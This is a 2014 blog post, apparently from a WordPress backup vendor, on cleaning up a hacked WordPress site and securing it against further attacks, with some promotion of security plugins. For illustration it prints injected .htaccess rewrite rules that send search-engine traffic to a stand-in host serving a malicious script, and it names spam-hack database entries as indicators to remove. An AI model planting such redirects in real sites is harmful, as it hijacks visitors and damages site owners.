When your WordPress site gets hacked

Mar 3, 2014

When your WordPress site gets hacked

Mar 3, 2014

WordPress, being the most popular blogging platform across the world, is frequently targeted by hackers. The flexibility that makes WordPress so attractive can also make you vulnerable if you are not cautious. Hackers are always on the prowl to exploit any loopholes in the system. Having your site hacked is a painful, emotional, and sometimes costly experience. It can cause serious damage to your business:

  • One fine morning, instead of seeing your delicious dessert recipes, the visitors to your blog find that you are selling them banned drugs, trying to infect their systems or redirect them to a site your grandma wouldn’t have been proud of.

  • Search engines results for your site indicate that the site is hacked or harmful, which causes your reputation to plummet and you lose customers.

  • The SEO rankings of your site take a big hit.

  • All your data is compromised and this can spell doom. Imagine what would happen if someone hacked into your bank’s site!

  • With growing reports of your site being malicious, your site will be added to the “blacklists” that ISPs use to prevent users from visiting your site. It is just as if you had closed your site and gone out of business.

Once your site is hacked, it creates a spiral effect and doesn’t stop until you have found the problem and eliminated it. Failing to do so will result in your being attacked repeatedly.

A lot of times you don’t even realize that you have come under attack which delays the rectification process. Hence, it is always good to be on alert, constantly monitor your site and take remedial action immediately when you notice anything wrong.

Although it is impossible to prevent every attack, there are many steps that can be taken to protect your website. Security is mandatory if you want to run a successful website, but it doesn’t necessarily have to be complicated or expensive. In this article, we’ll look at how to get back up on your feet when you come under attack and more importantly, measures to prevent further attempts at hacking your site.

Bouncing Back After Being Hacked

So you’ve confirmed that your site has been hacked and hit the panic button. Stay calm, deep breathe. The following remedial measures will help you organize your POA in the face of this calamity.

Tell the world. If your site has been hacked, you want to stop the bad guys from attacking your customers, damaging your reputation, or hurt your SEO rankings. The best thing to do is put your site in maintenance mode, making your site temporarily unavailable to public access. You can then post a suitable message, possibly including a contact number for people to be able to reach you. There are many plugins such as Maintenance Mode that help you do this.

Save the logs. Before you proceed with restoring your site, it is a good idea to save all the information related to the hack. This includes the hacked page, errors, and anything else that you deem worth noting down. Saving all this information will help in cleaning up your site later.

Contact the host. At times, vulnerabilities of your hosting provider may be exploited to hack your site. Hence it is important to contact your host team to let them know of the problem. Sometimes the hosting provider can also take your site offline when suspicious activity is observed. For e.g. large amount of spam originating from your site and loading the server. In such cases, you must clean up your site and contact your host to get your site up and running again.

Restore your backup. The quickest way of getting your site back to its old glory is to delete all the content and restore your backup. Once completed, your site is up and running again. blogVault is one of the premier WordPress backup services that performs daily automatic backup of all your sites. The tricky part of restoring a site is to know the safest rollback point. Using a service like blogVault will help you circumvent the problem as it maintains up to 30 backups to choose from.

Manual cleanup. In the unfortunate situation of not having a backup, you are left with the only choice of manually cleaning up your site. This is a very tedious task and can take many hours.

Some tips that come in handy while cleaning up your files are as follows:

  1. Look for files that seem out of place – mydata.php or easy.zip. They don’t necessarily have to end with the .php extension.

  2. Malicious code may also be contained within legitimate files and finding them is an uphill task, especially if you are not a programmer.

A common occurrence is that of obfuscating malicious code by hiding it with the PHP base64_encode() function and then using the  base64_decode() function to decode (i.e. un-hide) it. Finally, the eval() function is used to evaluate or run the malicious code. This malicious line is placed at the top of as many PHP files as possible. The malicious code could be to redirect your site somewhere else on the Internet so that the attacker makes money. If one earns $0.01 per redirection to an ad on the web, imagine how much money an attacker could make if a popular site gets infected.

There are many services such as MalCare Malware Scanner, Sucuri, Unmask Parasites, and Is-It-Hacked and WordPress plugins that help you scan your site to find these tricksters. See the section on Preventing Further Attacks for more details on these services and plugins.

  1. Look for suspicious redirects in .htaccess file. For example,

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://malicious-site.com/bad.php?t=3 [R,L]

What this rewrite code is attempting to do is checking for the referrer of a request, if it’s a popular search engine the hackers redirects it to their website and try to load the bad.php malicious script.

Since these RewriteCond conditional statements only match search engine bots, these hacks can go unnoticed for some time. Unfortunately, the longer they’re active the more damage it causes to your search engine rankings.

To fix the issue, just delete the suspect lines and save the file.

Apart from WordPress files, hackers can also wreak havoc by breaking into your database. Since database stores all the content of your site such as users, posts, comments, etc hacking your database may pose a big threat to you.

The following are some useful measures to cleanup your database:

  1. Hackers commonly add users to your database with admin access. This gives them free access to your site even after you have cleaned it up. To solve this problem:

    • Login to phpMyAdmin using cPanel.
    • Navigate to the users (e.g. wp_users) table within your site’s database.
    • Delete all users except the primary admin.
    • Change the admin password, the email associated with it and also the corresponding FTP account.
  2. Hacks such as the Pharma Attack use the options (e.g. wp-options) tables to load your spam. Some of the common option_name values to look for and clean up as listed below:
    • class_generic_support
    • widget_generic_support
    • fwp
    • wp_check_hash
    • rss_7988287cd8f4f531c6b94fbdbc4e1caf
    • rss_d77ee8bfba87fa91cd91469a5ba5abea
    • rss_552afe0001e673901a9f2caebdd3141d

Preventing Further Attacks

Once your site has been restored and you are feeling calmer, it is time to move on to the next important task of securing your site against repeated attacks. Unless you find the real cause of the hack and eliminate it, chances are that you will be hacked repeatedly, even within the span of days. We’ve already covered Securing your WordPress Admin in an older article. Here are a few more measures to safeguard your site from future attacks.

Fix the backdoors. The main intent of most hackers, once they exploit vulnerabilities in a theme or plugin, is to introduce a hole through which they can remotely access your server. This allows them to gain entry even after the questionable theme or plugin has been removed or after you’ve ‘cleaned up’ your site. Your site remains vulnerable until you find these backdoors and remove them.

Backdoors come in various forms – creating admin usernames, executing PHP code sent from a browser, execute SQL queries, etc. They are commonly hidden in the following locations:

  • Themes – Especially ones that are inactive.
  • Plugins – Out of date or poorly coded ones are the common culprits.
  • Uploads directory – Rarely monitored but comes with write permissions.
  • The wp-config.php, .htaccess files – Extra lines of configuration are added.
  • Database – Unauthorized users, spam entries can be found here.

Use Plugins. The most challenging part about backdoors is finding them. Since they are commonly hidden deep inside the code, it is nearly impossible to find them, unless you know your way through the code. Even for a developer, finding malicious code can be a time-taking and frustrating experience. Thankfully, there are a number of tools that do this for you. Here’s an in-depth description of the 3 most popular WordPress security plugins.

MalCare Banner

Better WP Security

Better WP Security is easily one of the most popular security plugins with a rating of 5 stars. It combines the best security practices into a single plugin to secure your website. Some of the important features of this plugin are:

  • Scans your site for vulnerabilities such as password strength, file permissions, using default names (admin user, wp-content directory, wp_ prefix), not using secure connections for login, etc.
  • It hides the sensitive part of your site such as login, admin, and register URLs.
  • Changes the commonly used names, for e.g. the content directory, wp-content, admin username, and database prefix “wp”, making it harder for hackers to go after the usual loopholes.
  • Limit the number of login attempts including blacklisting repeat offenders and lockout time periods thus preventing brute-force attacks.
  • Schedules automatic backups to help you get back on your feet quickly if your site crashes.


Sucuri is another comprehensive security plugin that checks your site for malware, spam, blacklisting, malicious code, and other issues. Some of the important features of this free plugin are:

  • Scans the complete site for malware, blacklisting, and other vulnerabilities and displays a detailed report.
  • Offers quick solutions to harden your site’s security such as using the latest WordPress and PHP versions, restricting access to core directories such as wp-content, wp-includes, and uploads, hides the WordPress version.
  • Checks the integrity of your site by looking at aspects like file modification time, login time, outdated themes and plugins, etc
  • In the unfortunate event of your site getting hacked, the Sucuri plugin enables you to reset your security keys and all user passwords. Sucuri Security

Apart from the free plugin, Sucuri also offers premium services such as round-the-clock monitoring and removal of vulnerabilities on your site. Refer to their site for more details.

Bulletproof Security

Bulletproof Security is another free security plugin that is fast gaining popularity in the WordPress community. Its ability to prevent code and SQL injection attacks is primarily responsible for its 5 star rating on wordpress.org. The important features of this plugin are:

  • Provides login security and monitoring – limits the number of login attempts, logs all login related information, configurable lockout period.
  • Includes a maintenance mode which can be extremely useful when you want to take down your site temporarily. It enables the admin to filter who gets to see the website and who will be greeted by a 503 Website. Using IP filtering, the access can be controlled directly from the plugin.
  • Locks down access to critical htaccess files by renaming and hiding them under different folders.
  • Logs HTTP errors and provides an option to add user agents and bots to a block list.

These 3 plugins should cover all the security gaps in the WordPress installation and help you protect your site from attacks.

Change all your passwords. The next step is to change all your passwords – FTP accounts, WordPress users, and database as well.

Change your WordPress secret keys. This will invalidate all the current sessions and force users to login again. Click here for more details on how you can change these keys.

Change permissions. It is a good practice to make all files/ folders read-only unless there is an explicit need to change this rule. This effectively prevents hackers from uploading files to certain directories and executing them remotely. The side-effect of doing this could be not being able to upload images to your server or cache plugins failing and reporting errors. This is because some folders such as uploads and cache are inherently assumed to be writable. In such cases, it is good make a couple of exceptions to the rule for smooth functioning of all features.

7 steps to secure your wordpress site

Limit what the admin can do. The WordPress admin enjoys complete control of your site and that includes editing files and installing themes/ plugins from the Dashboard. Disabling these features will prevent hackers from causing excess damage when they gain admin access to your site. You can do this by adding the following line in your WordPress config file, wp-config.php:

Refer to our article Everything about WordPress Configuration for more details. Always use the cPanel of your host to edit any file or install new components to your WordPress site.

Prevent open-for-all registration. Don’t allow unknown, outside users to register with your site. Instead, follow a strictly moderated approach to adding users to your site. The simplest way to do this is to uncheck the Anyone can register from the Settings->General panel of your Admin Dashboard.


Upgrade. Always keep your updated with the latest version from WordPress. You must also regularly update your plugins and themes.

Change your host. Your hosting provider may not be providing you the most secure service making your site vulnerable to hackers. In such a case, your best option is to change to a better one.

Always have a backup. We already saw how easy it is to recover a hacked site when you maintain backups. In case you haven’t already done so, register yourself with a reliable WordPress backup service such as blogVault to backup your site regularly.


Attacks are inevitable but locking your site down with the best possible security practices is definitely in your hands. So make sure your site is in the best shape when hackers knock on your door the next time…

Would love your thoughts, please comment.x